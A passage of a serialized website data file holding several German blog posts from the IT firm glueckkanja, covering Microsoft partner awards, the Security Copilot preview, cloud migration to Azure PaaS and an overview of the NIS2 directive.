Beginn neuer Partnerschaften und Möglichkeiten für die Zukunft. Auf ein weiteres erfolgreiches Jahr!",{"title":402,"searchDepth":403,"depth":403,"links":9158},[],{"titleClass":7896,"date":9160,"categories":9161,"blogtitlepic":9162,"socialimg":9163,"customExcerpt":9164,"keywords":9165,"hreflang":9166},"2023-08-09",[410],"head-inspire-2023-review","/blog/heads/head-inspire-2023-review.jpg","Bei der diesjährigen Inspire 2023 in München war das Team von glueckkanja erneut vertreten. Geehrt mit dem "Partner of the Year Accelerate Trust Award" im Bereich Security und erstmalig als Product-Partner der Microsoft Partner Community vorgestellt, setzt unsere Zusammenarbeit mit Microsoft stetig neue Akzente.","glueckkanja, Partner of the Year Accelerate Trust Award, Security, Edith Wittmann, Michael Flügge, Microsoft Partnerschaft, Microsoft Partner Community, Product-Partner, M365 Companions, KONNEKT, SCEPman, RADIUSaaS, Unified Contacts, Stefan Schönleber, Product Marketing & Sales Lead, Andreas Wach, Ebru Baumann, Cornelia Heyde, Fiskaljahr 24, AI, Azure Marketplace, EMEA, Corporate Accounts, Microsoft Technologie-Stack, Microsoft Service-Stack, GPS-Team, Ulrich Keller, Mathias Klaas, Chualin Go, Lejla, Kai, Inspire 2023, München, Partnerschaften, Zukunft",{"lang":2118,"href":9167},"/blog/corporate/microsoft/inspire/poy/2023/08/inspire-2023-review-en","/posts/2023-08-09-inspire-2023-review",{"title":9123,"description":9129},"posts/2023-08-09-inspire-2023-review",[422,1562,3934,9172],"Inspire","B4cBHSejhuq0i1TNOYolkRuplg3pc8f2Q9o5SDvCMkc",{"id":9175,"title":9176,"author":9177,"body":9178,"cta":3,"description":9182,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9218,"moment":9219,"navigation":415,"path":9230,"seo":9231,"stem":9232,"tags":9233,"webcast":406,"__hash__":9235},"content_de/posts/2023-11-15-microsoft-security-copilot-partner.md","glueckkanja ist einer der ersten Microsoft Security Copilot Partner",[191],{"type":350,"value":9179,"toc":9215},[9180,9183,9186,9193,9196,9199,9203,9206,9209,9212],[353,9181,9182],{},"glueckkanja verkündet seine exklusive Teilnahme an der Microsoft Security Copilot Partner Private Preview – eine wegweisende Anerkennung seiner erstklassigen Expertise in Microsoft-Sicherheitstechnologien. Ausgewählt wegen seiner langjährigen Erfahrung, seiner innovativen Denkweise und der engen, vertrauensvollen Partnerschaft mit Microsoft, steht glueckkanja an der Spitze, wenn es darum geht, bahnbrechende Sicherheitsfunktionen zu erforschen und maßgebliches Feedback zu zukunftsweisenden Technologien zu liefern.",[353,9184,9185],{},"\"KI ist eine der prägendsten Technologien unserer Zeit und hat das Potenzial, bedeutende, grundlegende Fortschritte in der Cybersecurity zu erzielen\", sagte Ann Johnson, Corporate Vice President, Microsoft Security Business Development. \"Security ist ein Teamsport, und wir freuen uns, mit unserem Security Copilot Partnerökosystem zusammenzuarbeiten, um Lösungen zu liefern, die die Cyberabwehr stärken und das Versprechen der KI Wirklichkeit werden lassen.\"",[353,9187,9188,9189],{},"glueckkanja arbeitet mit den Microsoft-Produktteams zusammen, um die Produktentwicklung des Security Copilots in mehreren Bereichen zu formen, einschließlich der Validierung und Verfeinerung neuer und kommender Szenarien, der Bereitstellung von Feedback zur Produktentwicklung und zu Betriebsabläufen, die in zukünftige Produktveröffentlichungen einfließen sollen, sowie der Validierung und Rückmeldung zu APIs zur Unterstützung der Erweiterbarkeit des Security Copilots. Um mehr zu erfahren, ",[374,9190,9192],{"href":9191,"target":5319},"https://aka.ms/IgniteFY24SecurityBlogPost","lesen Sie die Ankündigung.",[353,9194,9195],{},"\"Für einen Analysten ist die Arbeit mit dem Security Copilot wie das Tragen eines Exoskeletts. Alle seine Fähigkeiten und sein Wissen werden plötzlich und massiv verstärkt. Die Arbeit mit komplexen Kontexten wird einfach und kann in beispielloser Zeit erledigt werden. Wir bei glueckkanja lieben Security Copilot\", sagte Jan Geisbauer, Security Lead bei glueckkanja AG.",[353,9197,9198],{},"Security Copilot ist das erste KI-gestützte Sicherheitsprodukt, das es Sicherheitsexperten ermöglicht, schnell auf Bedrohungen zu reagieren, Signale mit Maschinengeschwindigkeit zu verarbeiten und das Risikoexposition innerhalb von Minuten zu bewerten. Es kombiniert ein fortschrittliches Large Language Model (LLM) mit einem sicherheitsspezifischen Modell, das durch Microsofts einzigartige globale Cyberbedrohungsintelligenz und mehr als 65 Billionen tägliche Signale bereichert wird.",[629,9200,9202],{"id":9201},"über-glueckkanja","Über glueckkanja",[353,9204,9205],{},"glueckkanja, ein renommierter Cloud Managed Service Provider, ist Top Microsoft Partner, der umfassende Cloud-Lösungen anbietet. Mit einem einheitlichen Blueprint-Ansatz verwendet glueckkanja Infrastructure as Code, um Kundeninfrastrukturen in die Cloud zu überführen und zu unterstützen.",[353,9207,9208],{},"Mit einem Fokus auf den sicheren und zuverlässigen Betrieb von Workplace Lösungen, Azure Services und Security Infrastrukturen bedient glueckkanja sowohl mittelständische als auch große Unternehmen. Das Cloud Security Operations Center von glueckkanja schützt kontinuierlich die Infrastrukturen der Kunden und ist in der Lage, Vorfälle zu bekämpfen und Schutzstrategien durchzusetzen. Mit einem 24/7-Incident-Response- und APT-Team stellt glueckkanja sicher, dass Kunden sofortige Notfallhilfe und Verteidigung gegen Cyberbedrohungen erhalten und dass ihre Infrastruktur immer auf dem neuesten Stand der Sicherheitsstandards ist.",[353,9210,9211],{},"Um ein nahtloses Cloud natives Microsoft Erlebnis zu gewährleisten, hat glueckkanja eigene Produkte entwickelt. Diese Tools ermöglichen eine vollständig geschützte, komplett Cloud zentrierte Infrastruktur. Ihre Produktpalette umfasst KONNEKT für das lokale Arbeiten mit Office 365 Daten, RADIUSaaS und SCEPman für eine sichere Netzwerkauthentifizierung ohne Server, RealmJoin für die Cloud Softwareverteilung und Unified Contacts für eine vereinfachte Kontaktsuche in Microsoft Teams.",[353,9213,9214],{},"glueckkanja gehörte weltweit zu den ersten Partnern, die die Auszeichnung Microsoft Verified Managed Extended Detection and Response (MXDR) erhalten haben. Mit einem Team von fast 200 Experten wurde glueckkanja in den Jahren 2017, 2019, 2020, 2022 und 2023 zum Microsoft Worldwide Partner of the Year ernannt. Seit 2019 befindet sich glueckkanja regelmäßig an der Spitze des ISG Microsoft 365 Deutschland-Quadranten. Darüber hinaus gehört glueckkanja mit seinen Innovationen zu den TOP 100 Unternehmen in Deutschland, und eine bemerkenswerte Bewertung von 4,8/5 auf kununu festigt seinen Ruf als führender Arbeitgeber im Mittelstand.",{"title":402,"searchDepth":403,"depth":403,"links":9216},[9217],{"id":9201,"depth":704,"text":9202},{"titleClass":7896,"date":9219,"categories":9220,"blogtitlepic":9221,"socialimg":9222,"customExcerpt":9223,"keywords":9224,"hreflang":9225},"2023-11-15",[410],"head-security-copilot","/blog/heads/head-security-copilot.jpg","glueckkanja gab heute bekannt, dass Microsoft das Unternehmen für das Microsoft Security Copilot Partner Private Preview ausgewählt hat. Mit seiner Expertise in Microsoft Sicherheitstechnologien wird glueckkanja diese KI-getriebene Sicherheitsinitiative mitgestalten. Das Unternehmen wird eng mit den Produktteams von Microsoft zusammenarbeiten, um die Produktentwicklung des Security Copilot auf vielfältige Weise zu unterstützen. Diese Zusammenarbeit ist ein wichtiger Meilenstein in den Bemühungen von glueckkanja, seinen Kunden innovative und sichere Lösungen anzubieten.","Microsoft Security Copilot, AI in Cybersecurity, Cybersecurity Solutions, Microsoft Security Technologies, Security Copilot Development, AI-Powered Security Product, Cyber Threat Response, Global Threat Intelligence, Tech Innovation in Security, Advanced Large Language Model, Microsoft Ignite, Microsoft Copilot Flight Engineers",[9226,9228],{"lang":2118,"href":9227},"/blog/corporate/2023/11/microsoft-security-copilot-partner-en",{"lang":9114,"href":9229},"/blog/corporate/2023/11/microsoft-security-copilot-partner-es","/posts/2023-11-15-microsoft-security-copilot-partner",{"title":9176,"description":9182},"posts/2023-11-15-microsoft-security-copilot-partner",[410,1117,9234],"Copilot","eGABWiNqRF00ORTzoc-etGAeYAojE2Mk-gFe1I60XZI",{"id":9237,"title":9238,"author":9239,"body":9240,"cta":3,"description":9244,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9274,"moment":9275,"navigation":415,"path":9284,"seo":9285,"stem":9286,"tags":9287,"webcast":406,"__hash__":9289},"content_de/posts/2023-11-26-cloud-migration.md","Cloud Migration ist mehr als nur „Lift and Shift“",[130],{"type":350,"value":9241,"toc":9269},[9242,9245,9249,9252,9256,9259,9263,9266],[353,9243,9244],{},"Die bloße Verlagerung von Servern in die Cloud, bekannt als Lift-and-Shift, ist oft nicht die optimale Strategie. Es geht vielmehr darum, Services an die modernen Anforderungen anzupassen und im Zuge der Migration zu optimieren. Statt sich auf traditionelle IaaS-Lösungen wie virtuelle Server zu beschränken, sollten Platform-as-a-Service (PaaS)-Lösungen in Betracht gezogen werden. Diese erlauben es, sich vollständig auf den Betrieb von Applikationen zu konzentrieren, da der Infrastrukturbetrieb entfällt. Ein gutes Beispiel hierfür ist die Migration von Datenbanken, die in der Cloud einfacher skaliert und bereitgestellt werden können. Auch die Bereitstellung von Web Services wie IIS- oder Apache Servern gelingt mit Azure PaaS-Lösungen leicht und effizient. Diese Lösungen bieten eine effiziente Alternative, um die genannten Anforderungen einfach und kosteneffektiv zu erfüllen.",[629,9246,9248],{"id":9247},"datenbanken-in-azure","Datenbanken in Azure",[353,9250,9251],{},"Beispielsweise können bestehende On-Premises SQL-Datenbankserver oder -Cluster durch Azure SQL Database oder Azure Managed Instance Services ersetzt werden. Diese Cloud-Dienste ermöglichen eine einfache, global verteilte Bereitstellung. Sie bieten zudem die Flexibilität, schnell auf wachsende Anforderungen zu reagieren. Dies umfasst sowohl die Möglichkeit, die Kapazitäten zu reduzieren als auch zu erhöhen, ohne neue, aufwendige On-Premises-Hardware anschaffen zu müssen. Für einen erfolgreichen Übergang ist jedoch eine sorgfältige Planung unerlässlich. Ein klares Ziel muss gemeinsam mit dem Kunden und dem Business definiert und festgelegt werden.",[629,9253,9255],{"id":9254},"web-services-in-azure","Web-Services in Azure",[353,9257,9258],{},"In Azure Web Services können Webanwendungen und Container-Lösungen implementiert werden, ohne dass, wie bisher, eine virtuelle Maschine (VM) mit Apache, IIS oder ähnlichen Systemen erforderlich ist. Dies reduziert den Wartungsaufwand erheblich. Zudem vereinfachen die zahlreichen Funktionen dieser Cloud-Dienste Prozesse, wie beispielsweise das Release-Management. Ein gutes Beispiel hierfür sind die Deployment Slots, die neue Möglichkeiten für das Release Management bieten.",[629,9260,9262],{"id":9261},"containerlösungen-in-azure","Containerlösungen in Azure",[353,9264,9265],{},"Um komplexe Anwendungsszenarien umzusetzen, ist es nicht zwingend notwendig, eine große Anzahl an virtuellen Maschinen (VMs) oder einzelne VMs mit vielen Services zu verwenden. Eine flexible und zuverlässige Alternative bieten Container-Lösungen, die teilweise direkt im Azure Marketplace von den Herstellern angeboten werden. Für diese Lösungen ist nicht unbedingt ein eigenes Kubernetes-Cluster erforderlich, das oft zu umfangreich für den tatsächlichen Anwendungsfall ist. Azure stellt je nach Bedarf verschiedene Dienste zur Verfügung, wie beispielsweise Azure Container Apps oder Azure Container Instances. Diese ermöglichen es den Kunden, erste Erfahrungen mit Container-Lösungen zu sammeln. Bei zunehmendem Bedarf kann später überlegt werden, eine eigene Kubernetes-Instanz einzurichten.",[353,9267,9268],{},"Cloud Migration geht weit über den einfachen Lift-and-Shift-Ansatz hinaus. Es geht um strategische Anpassungen und die Nutzung fortschrittlicher Cloud-Lösungen, um Geschäftsprozesse zu optimieren. Wie sehen Ihre Erfahrungen mit Cloud Migration aus? Für weitere Diskussionen oder um zu erfahren, wie Cloud-Technologien Ihre Geschäftsprozesse transformieren können, kontaktieren Sie uns gerne. Wir freuen uns darauf, mit Ihnen verschiedene Möglichkeiten und Strategien zu besprechen.",{"title":402,"searchDepth":403,"depth":403,"links":9270},[9271,9272,9273],{"id":9247,"depth":704,"text":9248},{"id":9254,"depth":704,"text":9255},{"id":9261,"depth":704,"text":9262},{"titleClass":7896,"date":9275,"categories":9276,"blogtitlepic":9277,"socialimg":9278,"customExcerpt":9279,"keywords":9280,"hreflang":9281},"2023-11-26",[1773],"head-cloud-migration","/blog/heads/head-cloud-migration.jpg","Unternehmen entscheiden sich aus verschiedenen Gründen für eine Cloud Migration. Eine häufige Motivation ist die strategische Ausrichtung des Unternehmens, zukünftig Workloads vorzugsweise in der Cloud bereitzustellen. Ein weiterer Anlass kann der begrenzte Platz oder die veraltete Infrastruktur in klassischen On-Prem-Datacentern sein. Besonders attraktiv wird die Cloud-Migration, wenn es um die schnelle und globale Integration neuer Services geht. Hier zeigt sich die Stärke der Microsoft Cloud, die umfangreiche Ressourcen und Services bietet, welche On-Prem nur mit erheblichem Aufwand und Kosten umsetzbar wären.","Cloud-Migration, Azure-Lösungen, IT-Infrastruktur, Cloud-Strategie, Lift and Shift, PaaS, IaaS, Azure SQL Database, Azure Managed Instance, Container-Lösungen, Azure Web Services, Release-Management, Kubernetes, Skalierbarkeit, On-Prem zu Cloud, Cloud-Integration, Cloud-Optimierung, Datenbank-Migration, Web-Service-Migration, Cloud-Infrastruktur",[9282],{"lang":2118,"href":9283},"/blog/azure/infrastruktur/cloud/2023/11/cloud-migration-en","/posts/2023-11-26-cloud-migration",{"title":9238,"description":9244},"posts/2023-11-26-cloud-migration",[1773,9288,5739,6132,1521],"IaaS","Ur29jL-NtzSHylktKrIiBP25bWog0FjNPQkkN6J4LVw",{"id":9291,"title":9292,"author":9293,"body":9294,"cta":3,"description":9298,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9310,"moment":9311,"navigation":415,"path":9328,"seo":9329,"stem":9330,"tags":9331,"webcast":406,"__hash__":9333},"content_de/posts/2024-03-13-mssp-2024.md","Nach dem Oscar ist vor dem MSSP!",[191],{"type":350,"value":9295,"toc":9308},[9296,9299,9302,9305],[353,9297,9298],{},"Der MSSP zählt zu den relevantesten Awards im wichtigen Security-Bereich. Bereits zum fünften Mal werden damit in diesem Jahr Microsoft Partner für ihre herausragende Arbeit und ihre Verdienste um die Cyber Security ausgezeichnet. Was den MSSP Award für uns so einzigartig macht: Alle Finalisten sind Mitglieder der MISA und Managed Security Service Providers, die ihre Sicherheitslösungen in Microsofts Sicherheitstechnologie integriert haben. Wer es hier auf die Shortlist schafft, hat sich also gegen ein weltweites Feld von Branchenführern durchgesetzt und zählt zur Crème de la Crème im Bereich Security.",[9300,9301],"quotes",{":quotes":9300},[353,9303,9304],{},"Noch bis zum 22.03.2024 können Mitarbeiter von Microsoft sowie Mitarbeiter der MISA Unternehmen für ihren Favoriten auf der Shortlist abstimmen. Die Verleihung der Microsoft Security Excellence Awards in den neuen verschiedenen Kategorien findet dann am 6. Mai 2024 im Rahmen der RSA Conference – übrigens nicht so ganz so weit von Hollywood – in San Francisco statt.",[353,9306,9307],{},"Und wenn wir schon bei den guten Nachrichten sind, dann schicken wir gleich noch eine weitere hinterher: Das Ergebnis unseres CSOC Customer Poll 2023. 100 Prozent der Befragten sagen hier, dass sie mit den von unserem CSOC bereitgestellten Ressourcen zur Erfüllung ihrer Sicherheitsanforderungen sehr zufrieden sind – 87 Prozent sind zudem sehr zufrieden mit der Expertise unseres Teams. Ein Umfrage-Ergebnis, das uns ganz besonders freut. Schließlich stimmen hier genau die ab, für die wir tagtäglich alles geben: unsere Kunden.",{"title":402,"searchDepth":403,"depth":403,"links":9309},[],{"titleClass":7896,"date":9311,"categories":9312,"blogtitlepic":9313,"socialimg":9314,"customExcerpt":9315,"keywords":9316,"hreflang":9317,"quotes":9322},"2024-03-13",[410],"head-finalist-mssp","/blog/heads/head-finalist-mssp.png","glueckkanja steht erneut auf der Shortlist des MSSP of the Year Awards 2024! Gerade noch haben wir in L.A. Christoper Nolan, Cillian Murphy, Emma Stone und den Blockbuster Oppenheimer beklatscht, da gibt es auch schon einen weiteren Anlass für echte Award-Freude: Wir von glueckkanja sind Finalist des Security MSSP of the Year Awards 2024!","MSSP, MSSP of the Year Awards 2024, Security MSSP, Cyber Security, Microsoft Partner, MISA, Managed Security Service Providers, Microsoft Sicherheitstechnologie, Shortlist, Security Excellence Awards, RSA Conference, San Francisco, CSOC Customer Poll 2023, Sicherheitsanforderungen, Expertise",[9318,9320],{"lang":2118,"href":9319},"/blog/corporate/2024/03/mssp-2024-en",{"lang":9114,"href":9321},"/blog/corporate/2024/03/mssp-2024-es",{"items":9323},[9324],{"text":9325,"name":164,"company":9326,"img":9327,"alt":164},"Unsere Mitarbeiter sind der Schlüssel zum Erfolg. Kunden schätzen die technische Expertise und den persönlichen Kontakt zu unseren Kollegen und Kolleginnen, was langjährige Treue zu unserem Service fördert. Diese Kombination aus Fachwissen und Innovationsfreude hat Microsoft nun zum zweiten Mal in Folge gewürdigt, worauf wir sehr stolz sind.","Security Lead","/people/people-jan-geisbauer-csoc.jpg","/posts/2024-03-13-mssp-2024",{"title":9292,"description":9298},"posts/2024-03-13-mssp-2024",[3933,422,1117,9332],"Misa","P_T6DU87zxXZpAH4o2Z4u9gbw-zSsGjzvHufLMbkkiU",{"id":9335,"title":9336,"author":9337,"body":9338,"cta":3,"description":9342,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9470,"moment":9472,"navigation":415,"path":9539,"seo":9540,"stem":9541,"tags":9542,"webcast":406,"__hash__":9546},"content_de/posts/2024-04-21-nis2.md","Sind Sie bereit für NIS2? ",[164],{"type":350,"value":9339,"toc":9464},[9340,9343,9346,9350,9353,9356,9375,9378,9381,9385,9387,9390,9404,9409,9413,9415,9418,9421,9424,9438,9442,9444,9447,9450],[353,9341,9342],{},"Die schlechten Nachrichten zuerst: Bereits bis zum 17. Oktober 2024 muss die aktualisierte Version der EU-Richtlinie zur Netzwerk- und Informationssicherheit (NIS2-Richtlinie) von der Bundesregierung in nationales Recht umgesetzt sein. Spätestens ab dann sollte Ihr Unternehmen die zahlreichen Anforderungen von NIS2 erfüllen – andernfalls können heftige Geldbußen drohen, die Geschäftsführung haftet dabei persönlich.",[353,9344,9345],{},"Die guten Nachrichten: Wenn Sie bereits Security-Lösungen von Microsoft nutzen, fehlt Ihnen und Ihrem Unternehmen möglicherweise gar nicht mehr so viel zur Erfüllung der komplexen Anforderungen. Doch eins nach dem anderen.",[2548,9347,9349],{"id":9348},"worum-geht-es-bei-nis2-überhaupt","Worum geht es bei NIS2 überhaupt?",[353,9351,9352],{},"{: .h3-font-size}",[353,9354,9355],{},"Jährlich richten Datensicherheitsvorfälle in Deutschland massive wirtschaftliche Schäden an. Angriffe auf Unternehmen werden häufiger, komplexer und damit gefährlicher. Gleichzeitig werden Netzwerke angreifbarer, angesichts von Remotearbeit und Geschäftstätigkeit in einer zunehmend vernetzten Welt. In diesem Spannungsfeld setzt NIS2 an.",[9357,9358,8923,9359,8923,9364,8923,9368,8923,9372],"picture",{},[9360,9361],"source",{"media":9362,"srcSet":9363},"(min-width: 992px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-statistik-de.png",[9360,9365],{"media":9366,"srcSet":9367},"(min-width: 768px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-statistik-mobile-de.png",[9360,9369],{"media":9370,"srcSet":9371},"(min-width: 576px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-statistik-mobile-de.png",[356,9373],{"src":9371,"alt":9374},"Statistik zu den Datensicherheitsvorfällen in Deutschland",[353,9376,9377],{},"Das Ziel der europäischen Richtlinie ist es, die Anforderungen an moderne Cybersicherheit und ihre Durchsetzung in den EU-Mitgliedsstatten zu harmonisieren, indem ein Maßstab für \"Mindestmaßnahmen\" festgelegt wird, die Unternehmen erfüllen müssen. NIS2 wird damit die umfassendste europäische Cybersicherheitsrichtlinie sein und 18 Sektoren abdecken.",[353,9379,9380],{},"Die Richtlinie muss bis Oktober 2024 von jedem Land in eigenes Recht umgesetzt werden, um Raum für nationale Besonderheiten zu geben. Dabei gibt es jedoch einige Mindestanforderungen, die in jedem Fall umgesetzt werden müssen. Da es zum aktuellen Zeitpunkt (Stand 21. April 2024) noch keinen offiziellen Gesetzesentwurf zur Umsetzung von NIS2 gibt, ist es für Unternehmen nicht gerade leicht, sich auf die neue Richtlinie vorzubereiten. Einige wichtige Fragen lassen sich jedoch jetzt schon klären.",[2548,9382,9384],{"id":9383},"für-wen-ist-nis2-relevant","Für wen ist NIS2 relevant?",[353,9386,9352],{},[353,9388,9389],{},"Zunächst sollten Sie sicherstellen, dass die NIS2-Richtlinie auf Sie und Ihre Organisation angewendet wird. Diese Prüfung geschieht nicht automatisch, sondern muss von Unternehmen eigenständig durchgeführt werden. NIS2 unterteilt dabei Unternehmen in verschiedene Gruppen. Betreiber kritischer Anlagen (KRITIS-Betreiber) fallen in jedem Fall in die neue Richtlinie. Die restlichen Unternehmen werden unterteilt in „wichtige Einrichtungen“ und „besonders wichtige Einrichtungen“ mit verschiedenen Kriterien, wie Größe der Organisation nach Umsatz oder Anzahl der Mitarbeitenden. Betroffen sind dabei 18 Sektoren:",[9357,9391,8923,9392,8923,9395,8923,9398,8923,9401],{},[9360,9393],{"media":9362,"srcSet":9394},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-sektoren-de.png",[9360,9396],{"media":9366,"srcSet":9397},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-sektoren-mobile-de.png",[9360,9399],{"media":9370,"srcSet":9400},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-sektoren-mobile-de.png",[356,9402],{"src":9400,"alt":9403},"Sektoren, die von der NIS2-Richtlinie betroffen sind",[353,9405,9406,9408],{},[433,9407,5105],{}," NIS2 betrifft die komplette Lieferkette eines Unternehmens. Daher kann die Richtlinie auch dann auf Sie zutreffen, wenn Sie zwar nicht die jeweiligen Kriterien erfüllen, aber Teil der Lieferkette eines Unternehmens sind, das von NIS2 betroffen ist.",[2548,9410,9412],{"id":9411},"welche-anforderungen-stellt-nis2","Welche Anforderungen stellt NIS2?",[353,9414,9352],{},[353,9416,9417],{},"NIS2 baut auf früheren Rechtsvorschriften wie NIS1 und DSGVO auf, ergänzt diese jedoch um zahlreiche neue Anforderungen. Im Detail werden diese neuen Anforderungen erst mit Veröffentlichung eines finalen Gesetzesentwurfs eindeutig sein, doch Unternehmen können sich schon jetzt umfassend vorbereiten.",[353,9419,9420],{},"Denn: Die NIS2-Konformität ist auf die gleichen Zero-Trust-Prinzipien abgestimmt, die von Microsoft Security-Lösungen ohnehin bereits berücksichtigt werden, um einen soliden Schutz vor Cyberangriffen auf der gesamten Angriffsfläche zu bieten.",[353,9422,9423],{},"Die Richtlinie basiert dabei auf einer Reihe von Prinzipien, deren Erfüllung entweder mit Microsoft Lösungen oder unseren Services und Produkten sichergestellt werden kann. Die wichtigsten Prinzipien haben wir Ihnen hier zusammengefasst:",[9357,9425,8923,9426,8923,9429,8923,9432,8923,9435],{},[9360,9427],{"media":9362,"srcSet":9428},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-prinzipien-de.png",[9360,9430],{"media":9366,"srcSet":9431},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-prinzipien-mobile-de.png",[9360,9433],{"media":9370,"srcSet":9434},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-prinzipien-mobile-de.png",[356,9436],{"src":9434,"alt":9437},"NIS2-Prinzipien, die mit Microsoft-Lösungen oder unseren Produkten erfüllt werden können",[2548,9439,9441],{"id":9440},"was-können-unternehmen-jetzt-tun","Was können Unternehmen jetzt tun?",[353,9443,9352],{},[353,9445,9446],{},"Mit Blick auf den nahenden Oktober und den noch fehlenden Gesetzesentwurf, könnte es für Unternehmen reizvoll sein, auf mögliche Schonfristen der Regierung zu spekulieren. Doch die Umstellung auf NSI2-konforme Systeme kann gerade für Organisationen, die noch mit Legacy-Lösungen arbeiten, potenziell weitreichende Folgen haben, die es gründlich zu planen gilt.",[353,9448,9449],{},"Unsere klare Empfehlung ist daher nicht mehr länger zu warten und jetzt zu handeln. Auch vor Inkrafttreten der NIS2-Richtlinie profitiert Ihr Unternehmen von einer soliden Risikomanagementstrategie, zeitnaher Meldung von Vorfällen sowie der Fähigkeit zur Überprüfung der Lieferkette und der Führung eines vollständigen Inventars aller digitalen Ressourcen.",[353,9451,9452,9453,9458,9459,9463],{},"Wir unterstützen Sie dabei nicht nur beim ",[374,9454,9457],{"href":9455,"rel":9456},"https://www.glueckkanja.com/de/security/security-consulting",[378],"Management"," von bestehenden Microsoft Sicherheitslösungen, sondern auch beim Setup zusätzlicher Schutzmechanismen. Unser spezialisiertes ",[374,9460,5638],{"href":9461,"rel":9462},"https://www.glueckkanja.com/de/security/cloud-security-operations-center",[378],", das eng mit Microsoft Security Technologien integriert ist, ermöglicht es, Alerts effizient zu überwachen und zu bewerten, echte Bedrohungen von Fehlalarmen zu unterscheiden und so einen umfassenden Schutz vor digitalen Bedrohungen zu gewährleisten. Durch die Einbindung zusätzlicher Datenquellen (non-Microsoft data sources) und den Einsatz fortschrittlicher Tools wie Microsoft Sentinel, bieten wir standardisierte Sicherheitslösungen, die präzise auf die spezifischen Bedürfnisse jedes Kunden abgestimmt sind.",{"title":402,"searchDepth":403,"depth":403,"links":9465},[9466,9467,9468,9469],{"id":9348,"depth":403,"text":9349},{"id":9383,"depth":403,"text":9384},{"id":9411,"depth":403,"text":9412},{"id":9440,"depth":403,"text":9441},{"seoTitle":9471,"titleClass":7896,"date":9472,"categories":9473,"blogtitlepic":9474,"socialimg":9475,"customExcerpt":9476,"keywords":9477,"hreflang":9478,"quotes":9481,"scripts":9484,"contactInContent":9485},"NIS2-Richtlinie 2024: Alles Wichtige im Überblick","2024-04-21",[1117],"head-nis2","/blog/heads/head-nis2.png","Die neue NIS2-Richtlinie stellt eine ganze Reihe von Anforderungen an Unternehmen und deren Cybersicherheit – von Mindestmaßnahmen für Kryptografie, Sicherheitsverfahren für den Datenzugriff bis hin zu Plänen für den Umgang mit Sicherheitsvorfällen. Wir verschaffen Ihnen einen Überblick und beantworten die wichtigsten Fragen.","NIS2-Richtlinie, Cybersecurity, EU-Richtlinie Umsetzung, Netzwerk- und Informationssicherheit, KRITIS-Betreiber, Microsoft Security-Lösungen, Datensicherheit, Compliance, Cyberangriffe, Zero-Trust-Prinzipien",[9479],{"lang":2118,"href":9480},"/blog/security/2024/04/nis2-en",{"items":9482},[9483],{"text":9325,"name":164,"company":9326,"img":9327,"alt":164},{"slick":415,"form":415},{"quote":415,"infos":9486},{"headline":9487,"subline":9488,"level":2548,"textStyling":9489,"flush":9490,"person":9491,"form":9507},"Jetzt beraten lassen","Sie haben noch Fragen? Wir helfen Ihnen gerne dabei, Ihr Unternehmen fit für die NIS2-Richtlinie zu machen.","text-light","justify-content-end",{"image":9327,"mail":9492,"number":9493,"cloudinary":415,"alt":164,"name":164,"quotee":164,"quoteeTitle":9494,"quote":9495,"detailsHeader":9496,"details":9497},"sales@glueckkanja.com","+49694005520","Cyber Security Lead","NIS2 verbessert die Sicherheit in Unternehmen der EU. Optimal wäre es jedoch, die Cybersecurity aus Überzeugung und nicht aufgrund von Vorschriften zu stärken. Microsoft Security bietet Top-Sicherheitslösungen, und glueckkanja ist Ihr führender Dienstleister dafür. Wir helfen Ihnen gerne.","Wir freuen uns darauf,\u003Cbr />von Ihnen zu hören!",[9498,9503],{"text":9499,"href":9500,"details":9501,"icon":9502},"+49 69 4005520","tel:+49 69 4005520","Jetzt anrufen","site/phone",{"text":9504,"href":9505,"icon":9506},"info@glueckkanja.com","mailto:info@glueckkanja.com","site/mail",{"ctaText":9508,"cta":9509,"method":407,"action":9511,"fields":9512},"Absenden",{"skin":9510},"primary is-light","/de/successful",[9513,9517,9521,9525,9530,9534,9537],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":9516},"Name*","name","Bitte geben Sie Ihren Namen an.",{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":9520},"Unternehmen*","company","Bitte geben Sie Ihr Unternehmen an.",{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":9524},"Email-Adresse*","email","Bitte geben Sie Ihre E-Mail-Adresse ein.",{"label":9526,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Ihre Daten werden zur Bearbeitung und Beantwortung Ihrer Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz finden Sie in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.","checkbox","dataprotection","Bitte bestätigen",{"type":9531,"id":9532,"value":9533},"hidden","_subject","Anfrage NIS2 Beratung",{"type":9531,"id":9535,"value":9536},"inbox_key","nis2-consulting",{"type":9531,"id":9538},"_gotcha","/posts/2024-04-21-nis2",{"title":9336,"description":9342},"posts/2024-04-21-nis2",[9543,1117,9544,9545],"NIS2","EU-Richtlinie","Zero-Trust","LCQWwKEj9M2Uehvyavc9ScJ04fgT4CjRJYiFuzkJLKA",{"id":9548,"title":9549,"author":9550,"body":9551,"cta":3,"description":9555,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9741,"moment":9743,"navigation":415,"path":9773,"seo":9774,"stem":9775,"tags":9776,"webcast":406,"__hash__":9777},"content_de/posts/2024-04-25-isg.md","ISG zeichnet glueckkanja erneut aus",[191],{"type":350,"value":9552,"toc":9734},[9553,9556,9560,9562,9565,9568,9571,9575,9577,9583,9586,9616,9620,9622,9628,9631,9651,9655,9657,9663,9666,9700,9704,9706,9712,9715],[353,9554,9555],{},"Als 